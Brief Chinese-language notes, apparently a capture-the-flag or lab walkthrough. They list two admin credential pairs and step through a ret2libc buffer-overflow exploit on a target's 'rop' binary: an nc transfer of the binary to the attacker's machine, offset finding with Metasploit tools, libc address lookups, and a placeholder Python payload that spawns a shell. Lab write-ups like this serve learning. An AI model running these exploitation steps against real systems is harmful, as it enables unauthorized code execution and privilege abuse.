admin:superduperlooperpassword_lol
admin:imnothuman
上面那一堆?!是Ook!语言
…
漏洞可以利用
52字节
整理一下缓冲区溢出利用过程
kali nc -lp 1234 > rop
靶机 nc 10.10.16.118 1234 < rop
收到rop后
kali机器需要的文件
/usr/share/metasploit-framework/tools/exploit/
文件夹下两个文件
1.pattern_create.rb #生成字符串
2.pattern_offset.rb #定位字符串
kali机器操作
1../pattern_create.rb -l 150
2.chmod +x rop
3.gdb ./rop
4.alsr
5.pdisass main
6.checksec
7.r '生成的字符串'
8../pattern_offset.rb -q 最后一行字符串
得到了字节个数
靶机操作
1.ldd /home/ayush/.binary/rop |grep libc #得到字符串1
2.readelf -s /lib/i386-linux-gnu/libc.so.6 | grep ”system@“ #得到字符串2
3.readelf -s /lib/i386-linux-gnu/libc.so.6 | grep “exit@” #得到字符串3
4.strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh" #得到字符串4
利用脚本
#!/usr/bin/python
import struct
buf = "A" * 字符串定位数值
system = addr(字符串1 + 字符串2)
exit = addr(字符串1 + 字符串3)
shell = addr(字符串1 + 字符串4)
print buf + system + exit + shell
wget上传脚本到/tmp
chmod +x exploit.py
/home/ayush/.binary/rop $(python /tmp/exploit.py)